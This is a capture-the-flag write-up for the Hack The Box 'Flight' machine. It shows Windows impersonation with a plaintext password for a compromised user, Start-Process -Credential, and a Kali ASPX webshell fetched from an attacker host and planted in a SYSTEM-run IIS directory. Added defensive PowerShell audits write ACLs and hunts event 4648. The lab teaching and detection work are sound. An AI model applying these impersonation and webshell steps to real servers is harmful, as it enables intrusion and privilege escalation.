Impersonation


There are myriad aspects to impersonation in security auditing, but this assessment focuses specifically on writing: getting a file into a directory under another user's security context.

An internal web server has been identified in the default Windows web directory at c:\inetpub; it was started by, and is running as, SYSTEM. Within that directory is what appears to be an updated version of the original web application, still in development: c:\inetpub\development.

Because the process runs under the security context of SYSTEM, compromising this internal web server process would grant privilege escalation.

ps c:\inetpub\development> icacls .
  flight\c.bum:(OI)(CI)(W)
  nt service\trustedinstaller:(I)(F)
  nt service\trustedinstaller:(I)(OI)(CI)(IO)(F)
  nt authority\system:(I)(F)
  nt authority\system:(I)(OI)(CI)(IO)(F)
  builtin\administrators:(I)(F)
  builtin\administrators:(I)(OI)(CI)(IO)(F)
  builtin\users:(I)(RX)
  builtin\users:(I)(OI)(CI)(IO)(GR,GE)
  creator owner:(I)(OI)(CI)(IO)(F)
 
Successfully processed 1 files; Failed processing 0 files
  • Checking the permission set on the c:\inetpub\development directory reveals that the current account, svc_apache, is not listed explicitly and so falls under builtin\users, which only has read and execute access.
  • On the other hand, the c.bum user does have write access to the directory.
    • This would suggest that the c.bum user can place a web executable file here for the svc_apache account to execute.
    • Given that the c.bum user has already been compromised, various methods for impersonation under that user's security context may be used.
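The misconfiguration above (a non-administrative user holding an explicit write ACE on a web root served by a privileged process) is exactly what a defender should sweep for. The following is an added example, not code from the original writeup: it parses the icacls output format shown above and reports write-capable ACEs for principals outside an expected set; the trusted-principal list and the constructed sample ACL are assumptions taken from this listing.

```powershell
# Audit an IIS content directory for write-capable ACEs granted to unexpected principals.
$TrustedPrincipals = @('nt authority\system', 'nt service\trustedinstaller', 'builtin\administrators', 'creator owner')
# Rights that allow creating or replacing files: full, modify, write,
# generic write, write data/add file, append data/add subdirectory.
$WriteRights = @('F', 'M', 'W', 'GW', 'WD', 'AD')

function Find-UnexpectedWriters {
    param(
        [Parameter(Mandatory)] [string[]] $IcaclsLines,
        [string[]] $Trusted = $TrustedPrincipals
    )
    foreach ($line in $IcaclsLines) {
        # An ACE line is "<principal>:(flag)(flag)...(rights)"; the summary line has no colon.
        if (-not ($line -match '^\s*(?<who>[^:]+):(?<aces>(\([^)]*\))+)\s*$')) { continue }
        $who    = $Matches.who.Trim().ToLower()
        # Force an array so a single group is not indexed as a string.
        $groups = @([regex]::Matches($Matches.aces, '\(([^)]*)\)') | ForEach-Object { $_.Groups[1].Value })
        if ($groups -contains 'DENY') { continue }   # deny ACEs remove rights rather than grant them
        $rights   = $groups[-1] -split ','            # last group holds the rights, e.g. (GR,GE)
        $writable = @($rights | Where-Object { $WriteRights -contains $_ })
        if ($writable.Count -gt 0 -and $Trusted -notcontains $who) {
            [pscustomobject]@{
                Principal = $who
                Rights    = ($rights -join ',')
                Inherited = ($groups -contains 'I')   # an explicit ACE on a web root deserves a closer look
            }
        }
    }
}

function Get-UnexpectedWriters {
    param([Parameter(Mandatory)] [string] $Path)
    # icacls prefixes the first ACE with the path; strip it so every line parses alike.
    $lines = (icacls $Path) -replace ('^' + [regex]::Escape($Path) + '\s*'), ''
    Find-UnexpectedWriters -IcaclsLines $lines
}

# Constructed sample: the ACL listing from c:\inetpub\development shown above.
$Sample = @'
flight\c.bum:(OI)(CI)(W)
nt authority\system:(I)(OI)(CI)(IO)(F)
builtin\administrators:(I)(F)
builtin\users:(I)(RX)
builtin\users:(I)(OI)(CI)(IO)(GR,GE)
creator owner:(I)(OI)(CI)(IO)(F)
'@ -split "`r?`n"

Find-UnexpectedWriters -IcaclsLines $Sample | Format-Table -AutoSize
# Live check of a directory: Get-UnexpectedWriters -Path C:\inetpub\development
```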

First, I need a way to execute OS commands under the security context of the c.bum user in order to write to the c:\inetpub\development directory.

Invoke-Command (failed)


PS C:\inetpub\development> $Cred = New-Object System.Management.Automation.PSCredential("FLIGHT.HTB\c.bum", (ConvertTo-SecureString "Tikkycoll_431012284" -AsPlainText -Force))
PS C:\inetpub\development> invoke-command -Computer localhost -Credential $Cred -ScriptBlock { whoami }
[localhost] Connecting to remote server localhost failed with the following error message : Access is denied. For more 
information, see the about_Remote_Troubleshooting Help topic.
    + CategoryInfo          : OpenError: (localhost:String) [], PSRemotingTransportException
    + FullyQualifiedErrorId : AccessDenied,PSSessionStateBroken

The PowerShell Invoke-Command cmdlet is not available for the c.bum user; connecting to localhost over PowerShell remoting is denied.

runas.exe (failed)


ps c:\xampp\htdocs\school.flight.htb> cmd /c where runas.exe
c:\Windows\System32\runas.exe
 
c:\xampp\htdocs\school.flight.htb> cmdkey /add:FLIGHT.HTB /user:c.bum@flight.htb /pass:Tikkycoll_431012284
cmdkey: Credential added successfully.
c:\xampp\htdocs\school.flight.htb> runas /savecred /user:c.bum@flight.com "cmd.exe /c whoami"
enter the password for c.bum@flight.com: 

runas.exe is located at C:\Windows\System32\runas.exe, yet it doesn't seem functional, as it doesn't fetch the credential from Credential Manager and prompts for the password instead.

Start-Process


PS C:\tmp> $Cred = New-Object System.Management.Automation.PSCredential("FLIGHT.HTB\c.bum", (ConvertTo-SecureString "Tikkycoll_431012284" -AsPlainText -Force))
PS C:\tmp> Start-Process cmd.exe -Credential $Cred -ArgumentList "/c whoami > C:\tmp\out.txt"
PS C:\tmp> cat C:\tmp\out.txt
flight\c.bum

The PowerShell Start-Process cmdlet works. I can use this method to write to the C:\inetpub\development directory.
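Both runas.exe and Start-Process -Credential start a process with explicit credentials, which Windows records as Security event 4648 ("A logon was attempted using explicit credentials") on the host where the command runs. The following is an added example for the detection side, not code from the original writeup: it pulls recent 4648 events and flags cases where a watched service account (svc_apache here, an assumption for this host) launched a process as a different identity. Field names follow the 4648 event schema; reading the Security log requires Administrators or Event Log Readers membership.

```powershell
# Hunt for processes started with another account's credentials (Security event 4648).
function Get-ExplicitCredentialLogons {
    param(
        [datetime] $Since = (Get-Date).AddHours(-24),
        # Accounts that should never run processes as someone else; svc_apache is an
        # assumption for this host, adjust to the environment.
        [string[]] $WatchSubjects = @('svc_apache')
    )
    $filter = @{ LogName = 'Security'; Id = 4648; StartTime = $Since }
    foreach ($e in Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue) {
        # Flatten the EventData <Data Name="..."> elements into a hashtable.
        $x = [xml]$e.ToXml()
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        [pscustomobject]@{
            Time       = $e.TimeCreated
            Subject    = "$($d.SubjectDomainName)\$($d.SubjectUserName)"   # account that made the request
            Target     = "$($d.TargetDomainName)\$($d.TargetUserName)"     # account whose credentials were used
            Process    = $d.ProcessName                                     # caller, e.g. powershell.exe
            Suspicious = ($WatchSubjects -contains $d.SubjectUserName) -and
                         ($d.TargetUserName -ne $d.SubjectUserName)
        }
    }
}

Get-ExplicitCredentialLogons | Where-Object Suspicious | Format-Table -AutoSize
```

Scheduled tasks and some services also generate 4648, so the Subject/Target pairing and the calling process are what separate expected use from a service account impersonating a user.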

┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ cp /usr/share/webshells/aspx/cmdasp.aspx .
PS C:\tmp> iwr -Uri http://10.10.16.8/cmdasp.aspx -Outfile C:\tmp\cmdasp.aspx

I will grab the default ASPX webshell available in Kali and transfer it to the target system over HTTP. This is just for PoC alone; I will employ another method to escalate privileges.

PS C:\tmp> Start-Process cmd.exe -Credential $Cred -ArgumentList "/c copy C:\tmp\cmdasp.aspx C:\inetpub\development\"
       1 file(s) copied.
 
PS C:\tmp> ls C:\inetpub\development
 
 
    Directory: C:\inetpub\development
 
 
Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       12/11/2023  11:02 PM                css                                                                   
d-----       12/11/2023  11:02 PM                fonts                                                                 
d-----       12/11/2023  11:02 PM                img                                                                   
d-----       12/11/2023  11:02 PM                js                                                                    
-a----       12/11/2023  11:03 PM           1400 cmdasp.aspx                                                           
-a----        4/16/2018   2:23 PM           9371 contact.html                                                          
-a----        4/16/2018   2:23 PM          45949 index.html                                                            

Using the PSCredential object of the c.bum user with the PowerShell Start-Process cmdlet, I can copy the ASPX webshell to the C:\inetpub\development directory. It should now be accessible, as I have previously tunneled target port 8000 to Kali port 8000.

Webshell


There it is.

Interestingly, the web application runs under the security context of the IIS AppPool\DefaultAppPool account, which is the default IIS application pool identity in Windows. Nonetheless, moving on to the Lateral Movement phase.